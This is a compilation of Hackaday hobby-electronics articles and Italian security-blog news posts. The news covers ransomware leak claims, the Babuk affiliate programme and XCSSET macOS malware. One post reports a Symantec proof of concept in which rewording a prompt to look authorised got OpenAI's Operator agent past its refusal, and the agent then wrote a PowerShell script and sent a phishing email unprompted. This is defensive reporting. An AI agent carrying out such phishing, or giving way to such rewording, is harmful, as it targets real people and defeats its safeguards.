
Building a Fully Automatic Birkeland-Eyde Reactor


Ever wanted to produce nitrogen fertilizer like they did in the 1900s? In that case, you’re probably looking at the Birkeland-Eyde process, which was the first industrial-scale atmospheric nitrogen fixation process. It was eventually replaced by the Haber-Bosch and Ostwald processes. [Markus Bindhammer] covers the construction of a hobbyist-sized, fully automated reactor in this video.

It uses tungsten electrodes to produce the requisite arc, with a copper rod brazed onto both. The frame is made of aluminium profiles mounted on a polypropylene board, supporting the reaction vessel. Powering the whole contraption is a 24 VDC, 20 A power supply, which powers the flyback transformer for the high-voltage arc, as well as an air pump and smaller electronics, including the Arduino Uno board controlling the system.

The air is dried by silica gel before entering the reactor, with the airflow measured by a mass air flow sensor and the reaction temperature by a temperature sensor. This should give the MCU a full picture of the state of the reaction, with the airflow having to be sufficiently high relative to the arc to extract the maximum yield for this already very low-yield (single-digit %) process.

Usually, we are more interested in getting our nitrogen in liquid form. We’ve also looked at the Haber-Bosch method in the past.

youtube.com/embed/L9KpFKQ7brY?…


hackaday.com/2025/03/15/buildi…


Add WebUSB Support To Firefox With a Special USB Device


Firefox logo displayed on screen
RP2040-based Pico board acting as U2F dongle with Firefox. (Credit: ArcaneNibble, GitHub)
The WebUSB standard is certainly controversial. Many consider it a security risk, and, to date, only Chromium-based browsers support it. But there is a workaround that is, ironically, supposed to increase security. The adjacent Universal 2nd Factor (U2F) standard also adds (limited) USB support to browsers. Sure, this is meant solely to support U2F USB dongles for two-factor authentication purposes, but as [ArcaneNibble] demonstrates using U2F-compatible firmware on a Raspberry Pi RP2040, by hijacking the U2F payload, this API can be used to provide WebUSB-like functionality.

The provided demo involves flashing an RP2040 (e.g., Pico board) with the u2f-hax.u2f firmware and loading the index.html page from localhost or a similar secure context. After this, the buttons on the browser page can be used to toggle an LED on the Pico board on or off. You can also read an input back from the RP2040.

This feat is made possible by the opaque nature of the U2F key handle: the browser forwards whatever bytes the page supplies in a sign request, so anything can be put in this blob, which makes passing data from the host to the U2F dongle a snap. For the inverse, things get a bit trickier. Here the payload is smuggled inside the ASN.1-encoded ECDSA signature that the dongle returns to the host. Since Firefox performs no signature validation (and Chrome only does a range check on the signature values), this works. The MCU also auto-confirms user presence when the key handle starts with 0xfeedface, so the device works without user interaction. However, you do seem to get an annoying popup that immediately goes away.
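To make the two channels concrete, here is an added example in Python (not code from the article or from ArcaneNibble's u2f-hax project). It frames a host-to-dongle payload in a key handle carrying the 0xfeedface auto-presence prefix, and packs a dongle-to-host payload into a DER-encoded ECDSA signature in a way that still passes the r, s range check the article attributes to Chrome. The framing layout (a 0x01 lead byte, a length byte, 31 payload bytes per INTEGER) is this example's own assumption, not the firmware's real encoding.

```python
"""Added example (not from the article or from ArcaneNibble's u2f-hax): the two
opaque fields of a U2F authenticate round trip used as data channels.
Host -> dongle: the key handle (browser forwards it verbatim; 0xfeedface prefix
is the auto-presence marker the article describes).
Dongle -> host: the DER ECDSA signature SEQUENCE { INTEGER r, INTEGER s };
Firefox does not check it, Chrome only checks 1 <= r, s < n.
The framing below (0x01 lead byte, length byte, 31 payload bytes per INTEGER)
is this example's own assumption, not the real firmware's encoding.
"""
from typing import Tuple

# Order n of the P-256 base point; Chrome's range check is 1 <= r, s < P256_N.
P256_N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
USER_PRESENCE_MAGIC = b"\xfe\xed\xfa\xce"  # assumed marker, per the article
CHUNK = 31            # payload bytes per INTEGER; 0x01 || 31 bytes < 2**249 < n
MAX_KEY_HANDLE = 255  # U2F encodes the key handle length in one byte


def der_len(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_integer(v: int) -> bytes:
    """Minimal DER INTEGER for a non-negative value (0x00 pad if sign bit set)."""
    body = v.to_bytes((v.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return b"\x02" + der_len(len(body)) + body


def encode_signature(r: int, s: int) -> bytes:
    """SEQUENCE { INTEGER r, INTEGER s }: the shape of what a U2F dongle returns."""
    inner = der_integer(r) + der_integer(s)
    return b"\x30" + der_len(len(inner)) + inner


def _read_tlv(buf: bytes, pos: int, tag: int) -> Tuple[bytes, int]:
    """Read one tag-length-value element at pos; return (value, next position)."""
    if pos >= len(buf) or buf[pos] != tag:
        raise ValueError("expected tag 0x%02x" % tag)
    pos += 1
    length = buf[pos]
    pos += 1
    if length & 0x80:  # long form
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("element runs past end of buffer")
    return buf[pos:pos + length], pos + length


def decode_signature(sig: bytes) -> Tuple[int, int]:
    """Parse SEQUENCE { INTEGER r, INTEGER s }, rejecting trailing garbage."""
    inner, end = _read_tlv(sig, 0, 0x30)
    if end != len(sig):
        raise ValueError("trailing bytes after SEQUENCE")
    r_bytes, pos = _read_tlv(inner, 0, 0x02)
    s_bytes, pos = _read_tlv(inner, pos, 0x02)
    if pos != len(inner):
        raise ValueError("trailing bytes inside SEQUENCE")
    return int.from_bytes(r_bytes, "big"), int.from_bytes(s_bytes, "big")


def chrome_range_check(r: int, s: int) -> bool:
    """The only validation the article says Chrome applies to the signature."""
    return 1 <= r < P256_N and 1 <= s < P256_N


def pack_device_to_host(payload: bytes) -> bytes:
    """Dongle side: hide up to 61 payload bytes in a signature that passes the range check."""
    if len(payload) > 2 * CHUNK - 1:
        raise ValueError("payload too long for one signature")
    framed = (bytes([len(payload)]) + payload).ljust(2 * CHUNK, b"\x00")
    r = int.from_bytes(b"\x01" + framed[:CHUNK], "big")  # lead byte keeps r >= 1
    s = int.from_bytes(b"\x01" + framed[CHUNK:], "big")
    return encode_signature(r, s)


def unpack_device_to_host(sig: bytes) -> bytes:
    """Host side: recover the payload from a signature the browser passed through."""
    r, s = decode_signature(sig)
    if not chrome_range_check(r, s):
        raise ValueError("signature would fail Chrome's range check")
    framed = r.to_bytes(32, "big")[1:] + s.to_bytes(32, "big")[1:]
    return framed[1:1 + framed[0]]


def build_key_handle(payload: bytes, auto_presence: bool = True) -> bytes:
    """Host side: key handle = magic prefix || payload, sent in the sign request."""
    handle = (USER_PRESENCE_MAGIC if auto_presence else b"\x00" * 4) + payload
    if len(handle) > MAX_KEY_HANDLE:
        raise ValueError("key handle too long")
    return handle


def parse_key_handle(handle: bytes) -> Tuple[bool, bytes]:
    """Dongle side: (auto-confirm user presence?, payload)."""
    return handle[:4] == USER_PRESENCE_MAGIC, handle[4:]


if __name__ == "__main__":
    # Constructed sample exchange: host toggles an LED, dongle reports a reading.
    print(parse_key_handle(build_key_handle(b"LED:1")))
    sig = pack_device_to_host(b"ADC=0x3ff")
    print(sig.hex(), unpack_device_to_host(sig))
```

The point of `chrome_range_check()` is that the covert channel survives the only check a Chromium browser performs: n is just under 2^256, so any 32-byte value with a 0x01 lead byte is in range, and neither browser verifies that (r, s) is a real signature over the challenge. A browser that validated the signature against the registered public key would close the dongle-to-host channel; the host-to-dongle channel through the key handle is inherent to the U2F design.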

Of course, this only works if you create a special USB device for this purpose. That means your normal USB devices are still secure. While we know it could be a security risk, you can do some cool things with WebUSB. We’ve seen a few projects that use it.


hackaday.com/2025/03/15/add-we…


You Too Can Do the Franck-Hertz Experiment


We talk about quantum states — that is, something can be at one of several discrete values but not in between. For example, a binary digit can be a 1 or a 0, but not 0.3 or 0.5. Atoms have quantum states, but how do we know that? That’s what the Franck-Hertz experiment demonstrates, and [stoppi] shows you how to replicate that famous experiment yourself.

You might need to translate the web page if your German isn’t up to speed, but there’s also a video you can watch below. The basic idea is simple. A gas-filled tube sees a large voltage across the cathode and grid. A smaller voltage connects to the grid and anode. If you increase the grid voltage, you might expect the anode current to increase linearly. However, that doesn’t happen. Instead, you’ll observe dips in the anode current.

When electrons reach a certain energy they excite the gas in the tube. This robs them of the energy they need to overcome the grid/anode voltage, which explains the dips. As the energy increases, the current will again start to rise until it manages to excite the gas to the next quantum level, at which point another dip will occur.

Why not build a whole lab? Quantum stuff, at a certain level, is weird, but this experiment seems understandable enough.

youtube.com/embed/St-EJRtIsHg?…


hackaday.com/2025/03/15/you-to…


Putting Conductive TPU To The Test


Bar of conductive filament with LEDs and a battery

Ever pried apart an LCD? If so, you’ve likely stumbled upon the unassuming zebra strip, the pliable connector that makes bridging PCB pads to glass traces look effortless. [Chuck] recently set out to test whether he could hack together his own zebra strip using conductive TPU and a 3D printer.

[Chuck] started by printing alternating bands of conductive and non-conductive TPU, aiming to mimic the compressible, striped conductor. Despite careful tuning and slow prints, the results were mixed to say the least. The conductive TPU measured a whopping 16 megaohms, barely touching the definition of conductivity! LEDs stayed dark, multimeters sulked, and frustration mounted. Not one to give up, [Chuck] took to his trusty Proto-pasta conductive PLA, and got bright, blinky success. It left no room for flexibility, though.

It would appear that conductive TPU still isn’t quite ready for prime time in fine-pitch interconnects. But if you find a better filament – or fancy prototyping your own zebra strip – jump in! We’d love to hear about your attempts in the comments.

youtube.com/embed/kwZItuntksc?…


hackaday.com/2025/03/15/puttin…


Orca Ransomware criminal hackers claim a cyberattack on Italy’s Casale Del Giglio


Yesterday the Orca Ransomware cybercrime gang claimed, on its Data Leak Site (DLS), a ransomware attack on the Italian company Casale Del Giglio.

In the post published on the underground, the criminals state that the gang holds 253 GB of data, more than 300,000 files in total, exfiltrated from the company’s IT infrastructure.

The gang’s site also shows a countdown indicating that the post will be updated in 5 days. On that date the gang will most likely publish part of the data it holds to increase pressure on the victim.

Disclaimer: This report includes screenshots and/or text taken from publicly accessible sources. The information is provided solely for threat-intelligence purposes and to raise awareness of cybersecurity risks. Red Hot Cyber condemns any unauthorised access, improper disclosure or unlawful use of such data. At present it is not possible to independently verify the authenticity of the information reported, since the organisation involved has not yet issued an official statement on its website. This article should therefore be considered purely informational and for intelligence purposes.

To demonstrate that they successfully gained access to the company’s IT infrastructure, the criminals posted a series of documents (samples) belonging to the company.

As RHC readers know, this usually happens when no agreement has yet been reached on paying the ransom the criminals demand. By threatening to publish the data they hold, the criminals increase pressure on the breached organisation in the hope that payment comes sooner.

As we often point out, the Darknet can be accessed by anyone who can use a PC normally. This is worth stressing because many claim otherwise, often in statements issued after ransomware gangs publish data, even though such information is publicly available as open source.

As is our custom, we leave room for a statement from the company should it wish to give us updates on the matter. We will gladly publish such information in a dedicated article giving the issue prominence.

RHC will monitor developments so as to publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower’s encrypted email.

What is ransomware as a service (RaaS)


Ransomware is a type of malware that is introduced into an organisation to encrypt data and make systems unavailable. Once the data is encrypted, the criminals demand that the victim pay a ransom, in cryptocurrency, to decrypt it.

If the victim refuses to pay, the criminals proceed to double extortion: the threat of publishing sensitive data previously exfiltrated from the victim’s IT infrastructure.

To better understand how criminal organisations operate within the ransomware-as-a-service (RaaS) business, see these articles:


How to protect yourself from ransomware


Ransomware infections can be devastating for an organisation, and data recovery can be a difficult, laborious process that requires highly specialised operators for a reliable result; without a data backup, there are many cases in which recovery has not succeeded.

Users and administrators are therefore advised to adopt preventive security measures to protect their networks from ransomware infections. In order of complexity, they are:

  • Train staff through awareness courses;
  • Maintain a backup and recovery plan for all critical information. Perform and test regular backups to limit the impact of data or system loss and to speed up recovery. Keep in mind that network-connected backups can also be affected by ransomware; critical backups must be isolated from the network for optimal protection;
  • Keep the operating system and all software up to date with the latest patches. Vulnerable applications and operating systems are the target of most attacks; ensuring they are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker;
  • Keep antivirus software up to date and scan all software downloaded from the Internet before running it;
  • Restrict users’ ability (permissions) to install and run unwanted software applications, and apply the principle of least privilege to all systems and services. Restricting these privileges can prevent malware from running or limit its ability to spread across the network;
  • Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, the embedded code will run the malware on the computer;
  • Do not follow unsolicited web links in emails;
  • Never expose Remote Desktop Protocol (RDP) connections directly to the Internet. If access from the Internet is needed, it must be mediated by a VPN;
  • Deploy Intrusion Prevention Systems (IPS) and Web Application Firewalls (WAF) as perimeter protection in front of Internet-facing services;
  • Deploy a natively automated XDR security platform, ideally backed by a 24/7 MDR service, to achieve complete and effective protection and visibility across endpoints, users, networks and applications regardless of resources, team size or skills, with automated detection, correlation, analysis and response.

Both individuals and organisations are discouraged from paying the ransom: even after payment, the cyber gangs may not release the decryption key, or the recovery operations may suffer errors and inconsistencies.

Cybersecurity is a serious matter and today it can deeply undermine a company’s business.

A change of mindset is needed now: treat cybersecurity as an integral part of the business rather than something to think about only after a security incident has occurred.

The article Orca Ransomware criminal hackers claim a cyberattack on Italy’s Casale Del Giglio originally appeared on il blog della sicurezza informatica.


My Scammer Girlfriend: Baiting a Romance Fraudster


Nobody likes spam messages, but some of them contain rather fascinating scams. Case in point, [Ben Tasker] recently got a few romance scam emails that made him decide to take a poke at the scam behind these messages. This particular scam tries to draw in marks with an attached photo (pilfered from Facebook) and fake personal details. Naturally, contacting scammers is a bad idea, and you should never provide them with any personal information if you decide to have some ‘fun’.

The game begins once you contact them via the listed email address, since the initial messages are all sent from hacked or spoofed email accounts. After that you have to wait for the scammers to return to the campaign on their monthly cycle, so give it a few weeks. Analyzing image metadata provides some clues (e.g. the FBMD prefix in IPTC tags set by Meta, as well as timezone info). The IP address from the email headers pointed to a VPN being used, so no easy solution there.

After establishing contact, the scammers try to coax the mark into ‘helping’ them move to their country, with Skype out-call numbers received on [Ben]’s burner phone that seem designed to add to the realism. Then ‘disaster’ strikes and the mark is asked to transfer a lot of money to help their new ‘love’. Naturally, [Ben] wasn’t a gullible mark, and set up a few traps, including a custom domain and website that’d log any visitor (i.e. the scammer).

The scammer happily clicked the link, and thus the browser language (Russian) was determined while confirming the UTC+3 timezone from the image metadata. Even more devious was inflicting Cloudflare’s much-maligned Turnstile feature, which is supposed to protect websites from bots and the like. This did, however, mostly confirm what the more basic JavaScript had sussed out previously. Pinning down the location of the scammers was proving to be rather hard.

The breakthrough came when following a similar scam email that came in, with the scammers having seemingly forgotten to turn on their VPN, as this time the email headers pointed to an IP address of a Russian ISP.
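The two header clues the article leans on, the originating IP from the Received chain and the sender's clock offset from the Date header, can be pulled out of a raw message with the Python standard library. This is an added example, not code from Ben Tasker's write-up; the message is constructed for it, with hostnames and addresses from the documentation ranges (example.*, 192.0.2.0/24, 198.51.100.0/24), which is also why it carries its own LAN-address list rather than relying on `ipaddress`'s `is_global` (which rejects those documentation ranges).

```python
"""Added example, not from Ben Tasker's write-up: extract the originating IP from
the Received chain and the sender's UTC offset from the Date header.
The message below is constructed for this example; names and addresses are
taken from the documentation ranges (example.*, 192.0.2.0/24, 198.51.100.0/24).
"""
import ipaddress
import re
from email import policy
from email.parser import BytesParser
from email.utils import parsedate_to_datetime
from typing import Optional

# Constructed sample: two hops.  The earliest (bottom) one was written by the
# sender's submission server, which recorded the connecting address in brackets.
SAMPLE_EMAIL = b"""\
Received: from mx.example.net (mx.example.net [192.0.2.10])
\tby inbox.example.org with ESMTPS; Sat, 15 Mar 2025 09:12:44 +0000
Received: from [10.0.0.7] (unknown [198.51.100.23])
\tby mx.example.net with ESMTPSA id 4Z9x; Sat, 15 Mar 2025 12:12:40 +0300
Date: Sat, 15 Mar 2025 12:12:31 +0300
From: "Anna" <anna@example.com>
To: mark@example.org
Subject: hello stranger
Content-Type: text/plain; charset="utf-8"

I saw your profile and decided to write to you...
"""

# Postfix/Exim style clause: "from <helo> (<rdns> [<ip>]) by ...".  The bracketed
# address inside the parentheses is what the receiving server actually saw; the
# HELO name before it is whatever the client claimed and is worthless as evidence.
RECEIVED_FROM = re.compile(r"from\s+\S+\s+\(([^)]*)\)", re.IGNORECASE)
BRACKET_IP = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f.:]+)\]")

# Addresses that cannot be the sender's public address.  ipaddress.is_global
# would also reject the RFC 5737 documentation ranges used in the sample above,
# hence an explicit list.
LAN_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "100.64.0.0/10", "fc00::/7", "fe80::/10", "::1/128")]


def connecting_ip(received: str) -> Optional[str]:
    """Connecting address recorded in one Received header, or None."""
    m = RECEIVED_FROM.search(received)
    if not m:
        return None
    ip = BRACKET_IP.search(m.group(1))
    return ip.group(1) if ip else None


def is_lan(ip: str) -> bool:
    """True for private, loopback, link-local or unparsable addresses."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return any(addr in net for net in LAN_NETS)


def originating_ip(msg) -> Optional[str]:
    """Walk the Received chain from the earliest hop (bottom) upward and return
    the first non-LAN connecting address.  Only hops written by servers you
    trust are reliable; a sender can forge any Received line below them."""
    for hop in reversed([str(h) for h in msg.get_all("Received", [])]):
        ip = connecting_ip(hop)
        if ip and not is_lan(ip):
            return ip
    return None


def sender_utc_offset_hours(msg) -> Optional[float]:
    """UTC offset the sender's mail client stamped into Date, in hours."""
    date = msg.get("Date")
    if date is None:
        return None
    offset = parsedate_to_datetime(str(date)).utcoffset()
    return offset.total_seconds() / 3600 if offset is not None else None


def analyse(raw: bytes) -> dict:
    """Parse a raw RFC 5322 message and report the two clues plus the hop count."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return {
        "originating_ip": originating_ip(msg),
        "sender_utc_offset_hours": sender_utc_offset_hours(msg),
        "hops": len(msg.get_all("Received", [])),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_EMAIL))
    # {'originating_ip': '198.51.100.23', 'sender_utc_offset_hours': 3.0, 'hops': 2}
```

The earliest hop is the one to trust least and inspect most: it is the only line that names the sender's real connection, but everything below the first server you control could have been forged by the sender. A VPN exit address there is the end of the road, as the article found, and it was the scammers' forgetting the VPN on a later message that finally exposed their ISP.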

Ultimately this sleuthing mostly reveals the depressing truth about these scams, in that the scammers will readily make up sob stories and pilfer people’s images from social media, all to find a few susceptible marks within the probably thousands if not millions who get sent these scam mails. The crude sophistry displayed in [Ben]’s article when it comes to photoshopping visas, passports, etc. tends to be still enough to convince those who want to believe that their soulmate just messaged them out of the blue.

As much as we’d like there to be a technological solution to scams, this is one area where only careful human ‘programming’ can help, and thus why educating everyone on the hazards of the Internet is so essential.


hackaday.com/2025/03/15/my-sca…


Hackaday Europe 2025: Streaming Live


Hackaday Europe 2025 is in full swing, and whether you’re experiencing it live in Berlin or following along from home, here’s where you’ll find all the info you need to get the most out of it.

Event Page: hackaday.io/europe2025

Chat: Hackaday Discord (Channels: europe-2025 / badge-hacking)

Talk Streams: youtube.com/@hackaday/streams


hackaday.com/2025/03/15/hackad…


OpenAI Carries Out Autonomous Phishing Attacks! Find Out What It Is About


Symantec security researchers have demonstrated how OpenAI’s Operator agent can be used to carry out network attacks with minimal prompting. The research points to possible future developments.

Symantec published the proof of concept on its research blog. The company observed that, so far, attackers’ use of large language models has been mostly passive: for example, LLMs can be used to generate highly realistic phishing emails, assist in writing basic code, and even support certain research activities.

However, with the advent of generative AI agents, these agents have become capable of proactive activities such as interacting with web pages. This advanced capability not only helps legitimate users but can also give attackers greater scope to commit malicious acts.

Automated phishing attacks


In this experiment, Symantec researchers used OpenAI’s new Operator agent. They asked the AI agent to perform the following tasks: identify a person holding a specific position at Symantec; find that person’s email address; generate a PowerShell script that could be used to collect information from the victim’s system; and write a “persuasive lure email and send the script to the person mentioned above”.

The first prompt entered was unsuccessful because the OpenAI Operator agent warned: “This involves sending unsolicited emails and could involve sensitive information, which may violate privacy and security policies”. However, when the researchers slightly modified the prompt to make it look like an authorised request, the AI agent accepted the task.
Figure: Prompts to OpenAI’s Operator agent used to generate the proof-of-concept phishing attack

The agent found O’Brien’s name based solely on his job title and then managed to deduce O’Brien’s work email address (although his address is not public) by inferring the email address format used by Broadcom (note: Symantec’s parent company). It then drafted a PowerShell script.

“After obtaining the email address, the agent wrote a PowerShell script to find and install a Google Drive-related text editor plugin,” the blog post reads. “For this demonstration, a purpose-made Google account was used with the display name set to ‘IT Support’. Notably, before writing the script, the Operator agent actively visited several PowerShell-related web pages, apparently looking for guidance on how to write the script.”

In the end, the AI agent generated a “fairly convincing phishing email” that tricked O’Brien into running the PowerShell script, which it attached to the email. Moreover, the agent sent the email without asking for any additional authorisation.
Figure: Content of the phishing email that was ultimately sent

A look at the future


Although LLM tools such as ChatGPT have added a series of security protections to make malicious prompt engineering harder, O’Brien pointed out in an interview that when using AI agents, users can actually watch their operations in real time and steer their behaviour in natural language.

“If the AI agent hits a certain security protection, the user can intervene manually to get around the restriction and then hand control back to the AI agent,” he said. “This raises a new problem: the agent’s safeguards only limit its own behaviour; they cannot control the user’s actions.”

Interestingly, the attack in Symantec’s proof of concept required little or no complex engineering. “The main purpose of the prompt engineering is to get around the safety measures and keep the AI agent from making stupid mistakes,” O’Brien explained. “Of course, if we spent more time carefully crafting the prompts we might be able to develop more complex attack techniques, but that is not the purpose of this study.”

The main takeaway from this research for network defenders is that, although AI agents are not yet widely used by attackers to carry out advanced attacks, the trend is cause for concern.

Symantec blog post



Massive data leak: Empire claims extraction of 3.1 million records from Honda Cars


A hacker known as “Empire” has allegedly put up for sale on the well-known underground forum Breach Forums a database containing 3,176,958 records belonging to Honda Cars India Ltd. According to reports, the leaked data includes sensitive customer information such as names, aliases, addresses, customer IDs, mobile numbers and email addresses.

The breach, if confirmed, is said to have occurred in March 2025 and would represent another serious cybersecurity incident in the automotive sector.

The attacker claimed on the forum to hold detailed records, with 2,866,348 phone numbers and 1,907,053 email addresses among the compromised data. To back up the claim, he shared a sample of the stolen information.

At present Honda Cars India has not issued an official statement on the incident, but the nature and volume of the exposed data could have serious consequences for the affected customers, including phishing scams and identity theft.

This is not the first time Honda has faced cybersecurity problems. The automotive industry, increasingly dependent on digital and connected systems, is becoming one of the main targets of cybercrime.

Cybersecurity experts stress the need to strengthen defences against these threats by adopting advanced measures such as AI-based (virtual) Security Operations Centers (vSOC). Companies must invest in protecting sensitive data, and customers are advised to monitor their information for any suspicious activity. With breaches in the automotive sector on the rise, more robust security strategies and stricter regulation are essential to counter emerging threats.



Probably The Simplest Sequencing Synth


With inexpensive microcontrollers capable of the most impressive feats of sound synthesis, it’s not so often we see projects that return to an earlier style of electronic music project. The 1-bit synth from [Electroagenda] takes us firmly into that territory, employing that most trusty of circuits, a 555.

It’s a time-honored circuit: a 555 provides a note clock that drives a 4017 functioning as a sequencer. This switches in a set of voltage dividers, which in turn control another 555 oscillator that produces the notes. It’s a fun toy straight from the 1970s, right down to the protoboard and hookup wire construction. There’s a demo video with some lovely beeps below, and we think most of you should have what it takes to make your own.

If you’re seeking more inspiration, may we introduce you to our Logic Noise series?

youtube.com/embed/OFlzEARGcgg?…


hackaday.com/2025/03/15/probab…


Make Your Cheap Thermal Camera into a Microscope


[Project 326] has a cheap thermal camera that plugs into a smart phone. Sure they are handy, but what if you could hack one into a microscope with a resolution measured in microns? It is easier than you might think and you can see how in the video below.

Of course, microscopes need lenses, but glass doesn’t usually pass IR very well. This calls for lenses made of exotic material like germanium. One germanium lens gives some magnification. However, using a 3D printed holder, three lenses are in play, and the results are impressive.

The resolution is good enough to see the turns of wire in an incandescent light bulb. A decapsulated power transistor was interesting to view, too. Imaging heat at that much resolution gives you a lot of information. At the end, he teases that using first surface mirrors, he may show how to build an IR telescope as well.

Presumably, this will work with just about any IR camera if you adapt the lens holder. The unit in the video is a UNI-T UTi-260M. So when he says he spent about $35 on the build, that’s not including the $400 or so camera module.

IR imaging can pull off some amazing tricks, like looking inside an IC. If the thermal camera used in the video isn’t to your liking, there are plenty of others out there.

youtube.com/embed/W5DLgJyDzIk?…


hackaday.com/2025/03/14/make-y…


Building a Ten-Hundred Key Computer Word-Giving Thing


From the styling of this article’s title, some might assume that the Hackaday editors are asleep at the switch this fine day. While that might be true — it’s not our turn to watch them — others will recognize this tortured phrasing as one way to use the 1,000 most commonly used words in the English language to describe a difficult technical project, such as [Attoparsec]’s enormous and enormously impractical ten-hundred word keyboard.

While the scale of this build is overwhelming enough, the fact that each key delivers a full word rather than a single character kind of throws the whole keyboard concept out the window. The 60×17 matrix supports the 1,000 most common English words along with 20 modifier keys, which allow a little bit of cheating on the 1-kiloword dictionary by letting you pluralize a word or turn it into an adjective or adverb. Added complexity comes from the practical limits of PCB fabrication, which forces the use of smaller (but still quite large) PCBs that are connected together. Luckily, [Attoparsec] was able to fit the whole thing on five identical PCBs, which were linked together with card-edge connectors.

The list of pain points on this six-month project is long, and the video below covers them all in detail. What really stood out to us, though, was the effort [Attoparsec] put into the keycaps. Rather than 3D printing his own, he used dye sublimation to label blank keycaps with the 1,000 words. That might sound simple, but he had to go through a lot of trial and error before getting a process that worked, and the results are quite nice. Another problem was keeping the key switches aligned while soldering, which was solved with a 3D printed jig. We also appreciate the custom case to keep this keyboard intact while traveling; we’re going to keep that build-your-own road case service in mind for future projects.

This mega-keyboard is a significant escalation from [Attoparsec]’s previous large keyboard project. The results are pretty ridiculous and impractical, but that’s just making us love it more. The abundance of tips and tricks for managing a physically expansive project are just icing on the cake.

youtube.com/embed/wC-24QeoQu4?…


hackaday.com/2025/03/14/buildi…


C+P: Combining the Usefulness of C with the Excellence of Prolog


In a move that will absolutely not over-excite anyone, nor lead to any heated arguments, [needleful] posits that their C Plus Prolog (C+P for short) programming language is the best possible language ever. This is due to it combining the best of the only good programming language (Prolog) with the best of the only useful programming language (C). Although the resulting mash-up syntax may trigger Objective-C flashbacks, it’s actually valid SWI-Prolog that is subsequently converted to C for compilation.

Language flamewars aside, the motivation for C+P as explained in the project’s README was mostly the exploring of macros in a system programming language. More specifically, by implementing a language-within-a-language you can add just about any compile-time feature you want including – as demonstrated in C+P – a form of generics. Even as a way to have a bit of fun, C+P comes dangerously close to being a functional prototype. Its main flaw is probably the lack of validation and error messages, which likely leads to broken C being generated.

Also mentioned are the Nim and Haxe languages which can be compiled (transpiled) to C or C++, which is somewhat of a similar idea as C+P, as well as cmacro (based on Common Lisp) and the D language.


hackaday.com/2025/03/14/cp-com…


Babuk Locker 2.0: new ransomware affiliate programme announced


Babuk, one of the best-known ransomware groups in the cybercrime landscape, has launched the Babuk Locker 2.0 Affiliate Program 2025, an affiliate programme for experienced hackers who want to make money from ransomware attacks. The programme, published on their data leak site, introduces new advanced features and a more structured model for those wishing to join their criminal network.

How the programme works


Babuk Locker 2.0 accepts affiliates from all over the world, regardless of language or origin, provided they have experience in penetration testing and in compromising computer systems. Their goal is clear: maximise earnings with targeted attacks and handle ransoms more effectively. The platform lets affiliates manage communications with victims and extortion operations on their own.

What is new in the platform


The new version of Babuk Locker introduces several features to simplify cybercriminals’ operations, including:

  • Control panel on Tor: an interface for managing attacks and negotiating ransoms.
  • Victim chat: a messaging system with notifications and file transfer.
  • Decryption verification: the ability to prove to victims that the ransomware can actually restore their files.
  • Babuk Stealer: a module for stealing data before encryption.
  • Automatic data upload: affiliates can upload stolen information directly to the group’s blog.
  • Network scanner: for discovering shared resources on the victim’s network.
  • Automatic ransomware distribution: the malware spreads without the need for scripts or advanced configuration.


How much affiliates earn


Babuk Locker 2.0 takes a fixed 10% commission on the ransoms received by affiliates. Each affiliate can negotiate directly with the victim and then transfer the percentage owed to the Babuk group. To ensure that participants are serious, the programme requires an initial deposit of 25,000 USD in Bitcoin, a strategy intended to weed out law-enforcement infiltrators and undercover investigators.

Who can be attacked and who cannot


Babuk has set some rules on targets:

  • Critical infrastructure off-limits: nuclear plants, public hospitals and organisations in the post-Soviet space are not to be attacked.
  • Permitted targets: private companies, for-profit educational institutions, pharmaceutical companies and cosmetic clinics.
  • Encouraged targets: police forces and government agencies engaged in fighting cybercriminals.


Conclusion


The Babuk Locker 2.0 Affiliate Program 2025 shows how sophisticated and organised the ransomware model is becoming. With increasingly advanced tools and direct handling of negotiations, the Babuk group positions itself as one of the most dangerous actors in the cybercrime landscape. For companies, staying vigilant and strengthening security measures is the only way to counter these increasingly aggressive threats.

L'articolo Babuk Locker 2.0: annuncia il nuovo programma di affiliazione ransomware proviene da il blog della sicurezza informatica.


XCSSET: the invisible malware threatening macOS developers


Microsoft Threat Intelligence recently discovered a new variant of XCSSET, a sophisticated malware designed to infect Xcode projects on macOS. This updated version introduces significant improvements in code obfuscation, persistence techniques and infection strategies, increasing the malware's ability to evade security controls and compromise developers' systems. The threat is particularly dangerous because of its modular nature and its ability to exfiltrate sensitive information, including personal files, credentials and even data related to digital wallets.

A persistent and evolving threat


XCSSET was first identified in 2020 as a malware capable of infecting Xcode projects, targeting macOS developers in a stealthy way. Its attack strategy involved modifying the files associated with development projects, spreading automatically to the users who downloaded and compiled the infected code.

The new variant, the first detected since 2022, has more advanced characteristics than the previous versions. Besides more refined obfuscation techniques, the malware uses new persistence mechanisms that let it stay active even after a system reboot. Greater code modularity has also been observed, which suggests that the XCSSET authors have built a scalable framework for distributing customized malicious payloads.

Analysis of the attack structure: interpreting the attached image


The attached image gives a visual representation of XCSSET's complex infrastructure, highlighting its many points of contact and interconnections with malicious modules, command and control (C2) servers and infection methods.

  • Central core (XCSSET): at the center of the map is the main node, representing the XCSSET malware, from which connections branch out to the various components and attack mechanisms.
  • Connections to C2 servers: the lines extending to the right connect XCSSET to numerous malicious domains and command and control servers. These servers act as management hubs for the malware, letting the attackers send commands, update malicious modules and collect stolen data.
  • Persistence and infection methods: the connections on the left illustrate the persistence techniques XCSSET uses, such as modifying the shell configuration file (zshrc), compromising Xcode builds and abusing legitimate tools to ensure it survives on the infected system.
